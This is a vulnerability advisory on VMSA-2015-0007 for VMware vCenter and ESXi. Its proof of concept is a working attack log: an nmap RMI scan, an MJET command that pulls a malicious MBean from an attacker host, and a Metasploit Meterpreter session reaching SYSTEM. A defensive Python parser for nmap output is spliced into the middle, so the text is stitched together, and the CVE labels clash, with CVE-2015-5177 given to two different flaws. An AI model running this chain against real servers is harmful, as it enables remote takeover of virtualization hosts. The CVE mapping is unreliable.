Critical vulnerability in VMware vCenter Server and ESXi
Advisory ID: VMSA-2015-0007
CVE numbers: CVE-2015-5177, CVE-2015-2342, CVE-2015-1047
CVE-2015-5177 – critical
Flaw in the JMX RMI service in vCenter Server – remote code execution.
A Metasploit module is already available for this.
Proof of Concept:

root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 --script=/usr/share/nmap/scripts/rmi-dumpregistry.nse

Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT     STATE SERVICE
9875/tcp open  java-rmi
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @1.1.1.2:50966
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)

root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done

Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM
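A defender-side check to go with the nmap step above, added here and not part of the original post: a small Python parser for the rmi-dumpregistry output format that inventories which hosts and ports bind the JMX connector (`jmxrmi` / `RMIServerImpl_Stub`), so exposed vCenter registries on 9875 can be found across a scan and prioritized for patching. The sample scan text is constructed, and the function names `parse_rmi_registries` and `jmx_exposures` are my own.

```python
import re

# Constructed sample (not a live capture): the port-9875 block from the scan above plus a non-JMX registry.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 1.1.1.2
9875/tcp open  java-rmi
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @1.1.1.2:50966
|     extends
|_      java.rmi.server.RemoteStub
Nmap scan report for 1.1.1.3
1099/tcp open  rmiregistry
| rmi-dumpregistry:
|   Calculator
|     example.CalculatorImpl_Stub
|_    @1.1.1.3:40001
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open")

def parse_rmi_registries(text):
    """One dict per bound RMI name: host, port, name and the stub class it serves."""
    records, host, port, in_block, name_indent = [], None, None, False, 0
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, port, in_block = m.group(1), None, False
        elif m := PORT_RE.match(line):
            port, in_block = m.group(1), False
        elif line.startswith("|"):
            body = line[2:]                      # drop the "| " / "|_" NSE prefix
            indent, entry = len(body) - len(body.lstrip(" ")), body.strip()
            if entry == "rmi-dumpregistry:":
                in_block, name_indent = True, indent + 2   # bound names nest one level deeper
            elif indent == 0:
                in_block = False                 # header of some other NSE script
            elif in_block and indent == name_indent:
                records.append({"host": host, "port": port, "name": entry, "stub": ""})
            elif in_block and records and not records[-1]["stub"] and not entry.startswith("@"):
                records[-1]["stub"] = entry      # first detail line under a name is its stub class
        else:
            in_block = False                     # any non-script line ends the block
    return records

def jmx_exposures(text):
    """Registries handing out the JMX connector stub, i.e. the exposure the vCenter finding above relies on."""
    return [r for r in parse_rmi_registries(text) if r["name"] == "jmxrmi" or r["stub"].endswith("RMIServerImpl_Stub")]
```

Feed it the saved normal output of an `nmap --script rmi-dumpregistry` sweep over the management network; every hit is a host whose patch level against VMSA-2015-0007 should be verified first.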
CVE-2015-5177:
Flaw in the OpenSLP function – remote code execution
Affected versions: 5.0, 5.1 and 5.5
CVE-2015-1047:
The vpxd service in versions 5.0, 5.1 and 5.5 is vulnerable to DoS attacks.
Corresponding updates are already available from VMware.